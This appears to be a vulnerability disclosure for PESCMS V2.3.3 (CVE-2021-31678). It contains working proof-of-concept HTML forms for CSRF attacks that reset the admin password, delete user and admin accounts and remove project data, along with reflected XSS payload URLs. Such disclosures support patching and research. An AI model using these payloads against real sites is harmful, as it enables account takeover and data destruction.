Headline
CVE-2021-31678: GitHub - RO6OTXX/pescms_vulnerability
An issue was discovered in PESCMS-V2.3.3. There is a CSRF vulnerability that can delete import information about a user’s company.
pescms_vulnerability****Cross Site Request Forgery(CSRF)-1****modify admin’s password ,mail,phone and head-image.
Technical Description: file : pescms/App/Team/PUT/User.php
The function of this file is to Modify personal information,but it don’t Verify whether the operation is legal. Through it attackers can modify admin’s password ,mail,phone and head-image.
Proof of Concept(PoC)
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
<input type="hidden" name="method" value="PUT" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="mail" value="123456@qq.com" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="password" value="newadmin" />
<input type="hidden" name="home" value="Team-Index-index" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Success.And the password of admin has been modify.
Cross Site Request Forgery(CSRF)-2****Delete the administrator and other member’s account number
Technical Description: file:
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
Throught it can delete Any member and administrator just by modify the ‘id’ that in Url. Delete the Account number of administrator just need to modify the id as '1’.
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Visit this page of poc:
We refresh the list of user ,that find that the user that called light is deleted.
Cross Site Request Forgery(CSRF)-3****Delete import information
Technical Description: file:
pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php
Through CSRF to Delete important data is exist in these files.
ALL the delete operations are not verify in front page. Like this:
Proof of Concept(PoC)
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
refresh:
And other operations of delete are exist on this cms. Just give the positions,don’t prove.
Reflected XSS in App/Team/GET/Repoort.php****In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF.
In line 72-78 , the data from $_GET(‘begin’) and $_GET(‘end’) is transfer to variables, and output in pages.
Proof of Concept(PoC)
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or,page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0
In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction